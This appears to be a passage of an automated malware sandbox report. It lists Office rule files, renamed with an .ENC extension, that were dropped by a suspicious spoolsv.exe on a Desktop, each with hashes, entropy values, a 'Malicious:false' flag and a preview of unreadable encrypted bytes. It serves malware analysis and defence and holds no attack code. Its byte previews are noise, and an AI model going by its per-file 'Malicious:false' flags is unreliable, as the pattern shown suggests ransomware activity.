                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.m-............&.j....(k?...$.G..y\.W....;*J..2~.......<N.F..S...2.Gs".S.3.S...l....yjI.x...B...k.{..Vw....h..l....4..\..o.1....3O..u].}}|.<.X....!^...?A.6.Hp\`!..;Xzl...F..}N.e/..$.Y...>s.U.M......q.....#Iq"+.+....?mG.W3!.9.F..:.=....,..3@b.M...J..No....#Y..|.%M.W...V....cU.....N.!..l&...;..2.(.U.};9.@}?.S.<c.q8kg8d.....'.....+.}E..{...;.2M.y.a.9.Lv[..fZ..c...y.Q...#.....[..s.........t.]j..I....dg.9V....6FDJ..D.f.K......Q.T.E9....9....z...;..eg.w)<..p..X..T..Zn8-.|.t.f._ i.gt.k\XP.b.h*......2./.p..~`.i.Q....(.| ...{`..Ybw.:<..!$.w...z..%/...r....DM..._-.....H(.I..D.}Y...~\.N.2....3..&...:.}lxP]{a.U.8*..M..H....."...sI&......./...q..H..7|Q9...%...}T<.d...........fX......X..gh.z....2l...HRF3<...K.h...l. ./.>............^..m_.!....'.........Zzb.*n/b.,...VX......N.....lsAv.g:.A/.............oE...UD_^....Q:Y..HJ.N..k.yaBf>..?.k..g!..o.e..x.V^.[W.c....q+........`4...!hS.......'e1\'[....'.....^...C.A.\..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702200v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.874194383662909
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+sWJ9S4XbtpUYqpVOEq0aB6y2TXL0yMsGkd0KmBLCms1vxfdfq/R1Rj3Zu6:+F9S4rEzO1zsAydT2BEv1vNdy/zu6
                                                                                                                                                                                                                                                      MD5:44323668881D5BF92E639CF5288C5CAD
                                                                                                                                                                                                                                                      SHA1:58FA2C98DC4C07E2275549B92294E767DFAE40A9
                                                                                                                                                                                                                                                      SHA-256:4716D8E558DC524D69B8B2DE2E99C0F8220AFB4D5766DC25E86D9297D25351E1
                                                                                                                                                                                                                                                      SHA-512:2D0D6E06AA69704A90BE05A573EE55CE9CB8CBAF7B10C04512D7012D7077F3240D46B8E106F3334C349AA1137515C4933DE31F905C8ADF8CE202873526ED3A97
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.i.|..O=}H....k./<.[..`..Dx.B.......GD...b#.j.5........`.Aj6h.{a..b.....S.<......m...jc.%..z.B..<.....<G3)......T..|u.2].}rM.keJU..O.O.b..9...l.$.].=......h..<..He...{(h..lks....$+2...G.r..g.b.a...|....u.....-..S.f.`n..`+I...].*...&..b..;.W.eG.9|Xg..M>qhY.v_J..(4..8:b{..5.j.....-.#.#.Z2bs...i..Y?.&..|. .3F...pt...3.k....z...["...M;..~.N.G...<6..-.ApZF-.......g<^{r.....U.y.g:qe..2.:s.....G+....y>......Y....2..+... .._[.4*..r..S7..eV.A/..YY..........]...j7!.v..\...+k>o..^..PJ.I7>O....H..eg .aN.9......`....!y..S....0.GYn.t..(..Z..B.wT.Q.j..u7..(."1b......._.......7..6!/e...D..0..lt%...~z.H.M\3".IO..*...k....Vhn.^.k.....G.,..[...P3n....t........Qs.....v..8i.3.I.Q.u....=.N.......C.L.3Q....c....0...le?...........U..&..f.^xD.TzR1x...T..5..W.Fy.:.B..'..`.?..}[3.l.......'....*.Q.0.j.>f......Ou.epzF...!..z.(...`.u.....aMB.4Y.bzCF..k..un=...C.z.n.......&...,...-QLl...?.x...9#.w.>.n..V ..8o....)......._.8.f.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702201v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.847758371545976
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+omqk609Ooyn/3VBin3rW4L0sH68k2+65qEgrp3zvnT3sNRryGnAoAb4h0:+hqkf3y63lL0g68kJ65ajr3sNRryGnAR
                                                                                                                                                                                                                                                      MD5:53F3C7C2ACD5FD3BCC33B2FDBA9F7BBE
                                                                                                                                                                                                                                                      SHA1:F04A4922F1BB69F0546E566E36B6F5F819A021B1
                                                                                                                                                                                                                                                      SHA-256:2E3D2BB11298BB9AA5B708693E9CE605A39FFE50FC6343D1A058DFEEEFA5007C
                                                                                                                                                                                                                                                      SHA-512:24DD67F50E5B003F4D7090965C380C354EE0C12C5B1AD482F0731E33C56187401D6FC04411A09C7CB8F49759268F2BFECC467347976C144F4416D6AAEDD2C733
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.B...U.....h]..4p....l.....d.W.:.i.%...T..Y?...4.U...s.....3F .F..".\.dl.N{..u,...(S{..u(d....3ZE.q .....I.j@.n...8Ap.j..P(|.&p....;..t.[.P...t.0[D}$....Rb3......\.)Q..Mg...nM)"[V...?...E....iq.a|.R.).!x...."..K..I\..5...,..D|PK.,.SIx......_`.)..,2.N~.Cx.......g>&...:Z.bk.....C_..8.#.7.......@...6...[J7...z.-...0...t..!o..^...M.ho<t?..?d.nQ..>gF.... ...YHxc..1_...D....f...4..M...7.j.]vho.mS....j.`.c\.... .<..ec.#..2....kW?3.6..).j..$....D......6j....G#...........i*o..43(X.X~.....H=..JcD...^..X.g>.CT,.....G.....^UW..j..8.1e..K....3..c.k-...#....=...Y..?'.I...f.!.....Z....P.;\S*..8..a..l[..m|.=..Ft.....?.b.t..Z..YW...oM.9>.1....BtJ>...^...,.).B...z...d....:Ce.7..(....3....O....J.03.^.:.fio...9.m..aMZ m.H....x...__...}.9.....zq..j.yyj%...ssCi}..rf_c...x.Y....v..q..p.....sE....'F&X.Zd...vdh..%......7..........X...t...UGDq....).y.40.W......`...G.....=.........EQ.....DN...,!H.r..F.W.......a)5Z#.N^C(......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702250v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.845222327270211
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+wTFZRoEDTD+j4BiXvtLuslWwCOJH6nHTH4bl8H7Fbc7poPhrIb:+AZRdici/tCslWwNH6HTY5QYghrIb
                                                                                                                                                                                                                                                      MD5:89A01973BAB72EB46E94A90FD7B7D292
                                                                                                                                                                                                                                                      SHA1:1918FB061981830252635DA4B5311EA1F25D9D19
                                                                                                                                                                                                                                                      SHA-256:DCB03ADD077EE9462E971504AFEA69B58FA1B6421E114A8F693FDC128ABF2765
                                                                                                                                                                                                                                                      SHA-512:E04D98D9E67D306C2DF871ABC9385426AC9DAC246DC77561B1DA5E892942BB262754AF8C8056FA73DF055A82DFFCAF3DEF66CA9E1AD17E2918DD976D3215F628
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.._C.9J..J.9.D..E..0!.1."..Z-.S[.9..J..'!.;.....*... ~@.~....a%|. ..}.|e....1.YP.R.4.?..I.>Z.5+l.5..R@.. q!..%...j.v7..0x7...e.K...`...Tc......k...E;....7.SQf0...x...&..j...-....u.?R...vN..f.R~.[.@.}.*........*..1(<K...o..O.,.0.f...H..xs}..@..i...Hz....f.....hu..M..."...8x.<...f..!..4$.1..d....\.0]..V...P.|...Oup.'b.....B..LN.k\..o~O.B..~.Y.LF,..P.G...+.{Zb../73..Cy...y..-.....MH.........<.I..dr.....5....<=}..y.U`/=.'...*..'m.k'...Zs@.)...s....>.ptr..J..L..S#&.:....(..$\.0* .Nv...]glw.5......+.I.v.....=....g3..{...4j|..."kt..:{..w$iJ..>..m.".3.#....+...meDd...&.*'y.x....aXO@.@.....5.r.'._...x2.../..y...Mtq...0..F.G.vS*.......z.}|...).1&.02.:.j....).0^z..._..J2.sE.......cB..%$...X>.....>.t...J....Nz..D=o.l...kc...Hx.0>.L.@...o9....8[.B.2....t..?..........AR.G.z...w..F.ie.}.E...(.1.Hf.o.. .7.XI~...s*....O.:.;.W2....z{.,d.bQv.(c`.......b[.........Zs.U$o.l>.nTs@...k.~/.....!?...k#.....yc...7zp+R.8

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702251v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.826711042767586
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+mDCocE2ewmdGdRfSy58WCMOFY4PVwLAYqoPAR8xYsJl/WZAmLLxUN/F+elxu:+mpHwuwRfZ+MT4MDhflGAm/xUx+
                                                                                                                                                                                                                                                      MD5:E13FEB69F7CC4E8CBCA2BF4F1D332F3D
                                                                                                                                                                                                                                                      SHA1:6B58CD988BFE2E5754B124D12E9EF9E73DB46237
                                                                                                                                                                                                                                                      SHA-256:A6BCE7D6588D3C8857A32C20066D6980B23BABD7F23B1E50B061A594BE8C9536
                                                                                                                                                                                                                                                      SHA-512:811E62D02C2584A670C6150F7BB23CAE446D615DEC53374588AC610495DDA7A00662BFF379881546AE9F6829DF0C59A811627B878C354FAE390AF4DDF785CFD9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.\....../.j..L....&..je6.^....`c...M."..*...G...i....=...!..5.@$...x.~.`..=!...G|.<q..j.<......Y].H.XDz..R0.k...z.D.<.ou.:...(...v....j.d....cv..Ah>c^,/.=.n:...TW.Tq..$.....T"....Pm/rS.......t..\;l#....rE."..e?,yT...Pd..m.......n....K.}P_;N.@3K(}...N.q...T.t....^./...@S>.C.v.[..M.G..&p.9.J......p.a./+...i...f..t.....\|N..B.._G:ygh|.v...X|*Y.D{.E...I.35.-w..b.E8T......p._.>.~...J(../T..1....=...I.:.D.(..J?...G....a+b}.NO.B.g..y..K}...`.,........sD....).....1...2^...j..g..5.`pM.h....x_.tq.4.-f ..F./..._....ZG...Agp..tc....:..,8..N.....B.^.1M..e.....{.L....4.d..&......8.V..3.../,.T.S.B.N....LZ..> ...Jn.. ..["2..z5.NK....4....(j..E..5.VJ.~.JjygL.v.!......I&." t.jt.2........wt....+..O.G.c.....h.k...4....<q....R.u..+.jo.L..&.am!4{)..z."S.9..-.m>.%i...P...[cv.....}k.......6g....g#..........`u..2.....(.>.(....f.)B8.O..4.....Q.:..@J7@.N.z...8...kSf.j.....Gp..I...PH.............0Ab\7.....=.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702300v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.85792156154837
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+bU9NUyjmkDYGvrQDJdW1YEnObpxV3UGF7gjeh5BHU7QCBvLFCRNPZAQKdn:+oxTfvk8tOfV3RVgCFMZLFCRNTMn
                                                                                                                                                                                                                                                      MD5:F53656985C58F1E87F2F9B0FBF71164A
                                                                                                                                                                                                                                                      SHA1:74E3967585B86C339814EFBD3184252C4D4D01B4
                                                                                                                                                                                                                                                      SHA-256:86FB873C2BCB22BDE4DDB6742F5DB8C5C51D9617B8468FBC76CDE4DB5189FA7E
                                                                                                                                                                                                                                                      SHA-512:0599FAB8B4C1532DA06A07F50DC2A4DF553B7AEA03150DC61E2B7FBAB6D7EEE9D72C38344917B9F4A11D97218AF62BA4E3FFD0FE2027AEC5B272B34AEAADE952
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...]....H.i.>=.x..@..W..loL#..~.v.F.v#Utg.......P...X.|....n&.K..5....<.;.z.EE..X...(V,H8y^.....A..t.~...X.A.e.D......5..L0..$....Y.G.4!...$:Y......... -#.!8.f.n....bm#j..T{.....hsW..-.g..._...::./y...J.....WG.@..T+4S.....v..9%Ou...I..O.n.**n."Y&..D./4....J.1......m.Ib.G.*..O&[......D.0.bm|g...e..7 .|..K&..;.H..U.'l...<)..G...M.I.}d.E.62TI..6.g.....?.)....(..-C.x.,{C.....!.B.....C`;........R.+..I?T....l.s...D...M....=Bj..3.........@...*...../.p&.l....y....2.......M.....j...Hv.[.....8|.....b.zSq....iS.}t.c..3.V}M..Mz..!..B.Xu..'+A.4r...-....r.Tn.]"T*.%......zl-@.....r..5E.o\K.U.u..- .e...2.....5...(...|@v..K-......=.h..Z.r....f......@o/K+;..R5..]..........t.s@.A...$...M....Y.Ql....3/.:o+t.;Z|... :......,.t...Nr=F...:6)@........Gb4......(v./r.X.......-V..A.l\_)..=.....6.L....-...N&dsw..........0Q"~X..u.r$D..b.{..]...Kd@bw..v}.le..!'......Zf...C.Z%/.4-...xotd 9M...9!..Y..b4...*3.W.).5......B..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702301v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.855093410788205
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+ePy4QPBpK302dZ3neLqmAIhDMKkl7PdLT8MD0xykDv8H6iiGHuloq:+UvQ3Kpne1AWAXl7POMUT8HfuR
                                                                                                                                                                                                                                                      MD5:7B163AA953214321238DF6E08B5C9CFC
                                                                                                                                                                                                                                                      SHA1:8988A7E690430CBB0C3CDF894E4FF3E1156C7302
                                                                                                                                                                                                                                                      SHA-256:F299FCA61A104319A82C14C344A7936BEFD2E06D4AEE13291ABCF91DC1556743
                                                                                                                                                                                                                                                      SHA-512:3CF9D7A4212A66470C3AAD2E0F2EA49FED13AC4C22396F6FBE6737DE55BB08E3B440B190C885096BC2DBDF98492F557B10546992B70D75271E2A7A9C061986F0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..ol.tp.A......._2..H....52..+D...M.. .5...^E.U.>w/.x...F........1...5.s..[O...r..w.i....W....9I..cz.-..F. uKA.c.%.bZ0r....p_..X.1 .deEn#.{...A......+....X..*J\u.[i......6.v;.MR....iPw.....('..k..1f..P....C..wx..h..'...}.1.....h....O[....'...^M.w....w..NH>.+!i.7.?...c.0.2..]...G.......d.M.CB.D.ee./.......7...K.T.f.L../&.l..*..y....l^...h..."..s...{VjPOM.z....@q.......\zT..?.'...s....j.....Y.......j......_.m.(.8-.G[..._qM.......j......L:t...~...o=.i.)>.W..;.....F...NO.u.....Y.).+.l.Hr...F.>Na.%.....t..[".N..'...+..m..&........t.2...gX.aJ...K..<........s.Q...Q.@.pl.8...N.B...,G1#.3.wU..e=.G.A..k.F./.S..8"Zg..W;zG..hf.....-.....L..p.G..IH.,.<[+.}.A..o;...=D.O...`..%.rS.A.{..0..2..7.7....f....s'.. {K.A9.9...yj..#....F....+......[......FW8...}.}a2..<}.....>.+.n....).e'..B.X.......}.5..g..[=..#.Z.u#]..F..V..1e.0.=O@..D......&.!.(J...j.K[+....y..s..oW..".oM[.m....ig.u%R.V.d..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702350v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.859004820420651
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+4M5fyF9QGj8QwPxnQnoXvZW7KoFzNJ3LbSPqPQO4CgbLHXhaao2y690o1Juy7wV:+h6IGjBwZQoXRcKobJKiPQO4Cg3sao2E
                                                                                                                                                                                                                                                      MD5:C1F7F6EED7D6899F7A84BD15DF7E2A4F
                                                                                                                                                                                                                                                      SHA1:E18DCC954911680A77912BE34DBDA4A98B15D76C
                                                                                                                                                                                                                                                      SHA-256:EF3E16AD822B886A52799F5138D055FAA6282603A5EBD4D40604245B0A5600AC
                                                                                                                                                                                                                                                      SHA-512:9939ABC65AF9120E66ADC67C43D3B71D3D812E5CD4F56D1582BA94B7600AF00ADB176A30D8807CC9314940557D3F8F4369DE9A4625184CC5D8FD296080B56FB2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.)..')..=I*....o.2_..foSp<.$/..g......{7..L..C..f}.fSp..L4....e...@.G.....-/CK.LD...,........L....V.9.....I.g..pn........U...D..c.r..._..r..Fxb..EF(...0....yU.1`.C.Ao5.Z......:...AgZ-[z[.!....."......l.t..B...........:.b)....*.r|>.%.......l....yb.....7.LeJ......mg...X..3..]%....0 ....1s.^rf..8..U......#t.js.r..AHH.H....d......?.>T..I..q...8).~$..U.S.../\._.qKO;A....E...p..4.w..\.q.nuc^.bo.kI.@.J#. .P...ccF..w.!q.d1.7.yw,.v...^n..m....D..)o.../"..J../....%.+.q.B...y*...K.n........8..].g.h.>d.....|F..6.(D4..8..\D.......AB..B...........*.p.L.<..h.s"db.Y.>.O.T;......$...&..O+A....$..,... ..SI..v.M......^p.....p..........."5.s.=.c..>...g..h........?.x~sw...h.r..._%.W..}L9B=...9.aD.b....B...]......y..G.C...C.l.d|.......i ...|.N(...$..$.{ .|.2.L{5u..YF...m%......s...M.o.c.D.......0.....y.W...?I*5...q...<.YF......H..8H......`#.[..<....P.C2...g.gS.*...D...g.....%s.y.^....P...)....{..[.s.so.o.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702351v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.858144012521823
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+dSxBKn5JW/Dj4Wwx+TRYKvqaZNKi2T1AvTlNGD9uviU7NVdnl4uQSgd6DG:+KBhTHvlzYAblUwpMdEG
                                                                                                                                                                                                                                                      MD5:7A37E535A9265D0AA74603C3E4BB201F
                                                                                                                                                                                                                                                      SHA1:4E8DA1701A1FBC170EB6987B543D8759FD360337
                                                                                                                                                                                                                                                      SHA-256:B0B4C56D4A0F5C79E0DD0564FFE81DCD3B8B66A9CC652CDAC1A60C69CE4A80A0
                                                                                                                                                                                                                                                      SHA-512:F765610E8A563117BAD83E7FD48226AC61CB359B75239D6A7ABDCCB05284A082D657C7DB7A1175569B2074583167000F8EECC7C6E0BE8BF28AC74C8AD41197A6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.uO.jK...l33....q.^.QYvB9E$b.?,.... .t.}.R._.......T.....Qz4..ez...B..P.#.m"9.........!...{cOP..99:.=......;..g6r....3.`q..\..8.n.# .<V......T..w...b.1...i.yn.+@..nH.E.....[..............8.....!p..|...._uy.C..>......7......9.m.A..n....'. ..j=E.........&k}........i..w).....g.?..=..X..%..8..1...%.[.9.._..'D'h.5s7F}....`&..B....A.+.8.gN..e..8.B.?C.9....8....,.[GxJ@.6.#...(-1qF...go.@\M..R7[.)9...7.G.. .e.....WQ.~|...r.........{D.q)U).....9J.=I...I..q......u.....t.2*DN...}.....+[,b`...C.Y...x.c.( .Uy...=.o.9....{.Oy.%.*....&...3........}.r....T.t...W.a.~..u!S|.#..._..J:...;-..8.|..KR...WL ....{..D..[.d{.S.....ns.:....{I.......km-..l.r`.)S.n..b..*.i{A..Js_@.1......p...KI..s...m#.0...EE9+u.=*.M.2......#=....p#..0J...............l..D...I..KY..........(.s.Aa.....#UT..i.....uE*...s..|..^t.?..V.K.........GU..dP....`.e..Vp...l..].`vh..5W..l.)......*....<.W..+.pp...~...D.G..#.....#*...T..is#7$.2.\.0a5..^`...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702400v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.855628633942792
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+2iYpy1KgWoQNwRCl63KfsogXoQJi+lKUwvwfoqvoJY1H+4ZlTbiBILEg3KnAjkW:+b2YKtlNYCw3KF3QJvlKUwkoqJ+4fbis
                                                                                                                                                                                                                                                      MD5:643824827A9FED018C9B9DEF0156D2F6
                                                                                                                                                                                                                                                      SHA1:DF0F859C271860ABAA611F3E4801D4430592E0B9
                                                                                                                                                                                                                                                      SHA-256:12E7E15364CC440207C7EA5B47F92CD9E7703E71F124C672DCACBBD1B30E0C0D
                                                                                                                                                                                                                                                      SHA-512:A1E3950EA7C1289D2A9010F560185E2C1614D58196ED3581DD90DCCFBDF09E437FFA63F14AA1544208F138B0F62C3A060ED62DF335CF55058AD53460624BD0CF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.o8cE.D.y......`.e!|...Z../...4Qf.....;F:...{?.\r.X....}.....[5..6.*..K..z.....b..1.....ql~&.e)@.VG.. ..'6$[..p.G.0.}..z.Z..._.RJipY.G@e.H[E..G-4..>......G-......h...9:F ..ss.....e...wOA.b....r..t#$.......Mz"g.B..(.[..}R..h..........9.m@Me...z$..p..(.eK.>.L....A..p%G..rD..s.cP..tB.?8f..rWaz_..+R.g..k..=.nl...T..EyJ...i.'....>..K...#.:...@..%.X....o.O.cZ..hm.\....e....X.t.a..9.....j.d.xWz...0.....~S.V....x.^..O.A..G_..%).e.F...f.hu.b...w....].{...E.....9....g..Q.zA.....:...bL/1&j....%R.....z..d....................%..>].Z....'..I+.). ...?WMN\...B.g..!....ol.&..).9......./..xs2..rU[....G7.)|.........U+.A...@.O.x.q.k&~>...(Fu^./...k..u........N.u2Cw{._...4...!.3..*2u..|.>0.........-hi..Kd..7.I.V....a....+.+.....E..S.....Z...g....t.hN.Tx.......'.~.^@.!.XKB..k...i6Ww1.7...\....[....2[t^.._..HC.D.D.Rf._..........rk)m..`..YA..G...X..........8.&.c...[...&...I....C.9o.)...:*...!W...?....#.(g.e@.@..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702401v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.874213979906293
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+Fo9Ulvu1KhFGritzxbUWLTH2QfAG+hpnHX97Au5hqqbAfFNAcHzwI8x:+FoCvu1YTtzxAaHd+/HX6+hqNNXL8
                                                                                                                                                                                                                                                      MD5:840D36ABA2CE8C8B857E4136224EF1D6
                                                                                                                                                                                                                                                      SHA1:1538386FCF319C06C487844824A39A24643C0461
                                                                                                                                                                                                                                                      SHA-256:11DC7958CB90F9F204102CEB791208B111EA536C923C81022A4D76335C14A725
                                                                                                                                                                                                                                                      SHA-512:BF818E9A36548590807B0EF72111719C14671BF3C3A2D1374C920C86BDD99BE32F5342F787D57D67395CE45E39F363A2AD24BD10F3AEE0F637C7402E36388CE5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F....1E..j.j;..0.B.2.X....6.w.).L.BG...&r....#.I-.......E.)...Y.+..R...G..xJ0 ....t.......;.{.|../;\+~..?!....J.v"..[.G.p...{....x.W}S...."Z.l.l.xD.....H. .{[...7O..e..c.............5......)"..povq%....p..i...t.WH~..$R.j."M......:@k..{.(.n......5%[.......}.^...h.\p.&.r..I.]J....^..d|c%.R..e.V.x~..OLw.$.(..L...-..al.....R3...z'R*I.o..J..1T+...f.)........V.H@.-....:.ey...=..>"N...H.L..<..u..1?.tC...}8..T.:6...&......f..y..m.QP...[..1..s.!....,;.....A.,V(....%...Zb7'..ML.d.P.^u.3.X...M........y..?y...r..*...?...W"q....EL.F... ....Y/%.U.!.)O^$as.j.}......}^RQF...........71d.O..E+.T,k........Y....k.G)7...-.........3...{...k.l6j.%2.JZ/....V.N._..K.S?...C..5IT.;Z/..R...W..5.c_.".dR..$..............j.....m.W=........9..0.....L..Y>..M....8.....wC..#....&'.G#..`....$......6.V.$.A..M$......?.`....OC.;..7..W...d35..2....x....t.f8.....'.[..WcE-.q....]..J.C...M...\......W.Y>.Q...p....G.56o.] ..../.NC.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702450v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.864608415255877
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+kH3Chtr8rLyn+29V9ZUvJGdqyudsWu9bUX0WTfAsQdDI33TY2c7oxH8zgUIwjJr:+kHynr4LynB99fdfTW2C7IsQJIHa7sct
                                                                                                                                                                                                                                                      MD5:D3078DB6FB6D9095AA669A397B76169A
                                                                                                                                                                                                                                                      SHA1:1E37F8FAC1FA0BDA73AF6035679A04FB2F2CF254
                                                                                                                                                                                                                                                      SHA-256:592A9914B37DE9B335D503DC2A808F2765233E6CD10CC0F91EA02F5B43D0DE98
                                                                                                                                                                                                                                                      SHA-512:E7BE7CADEE50E5AE56AF0AE65EB82CCB775DC9CAFEF9D82A901F62F064BFCF38C4E4822C0020278D67E63E11FA849664CCC36200655BF1435EA7D1AEABC7FB14
                                                                                                                                                                                                                                                      Malicious:false
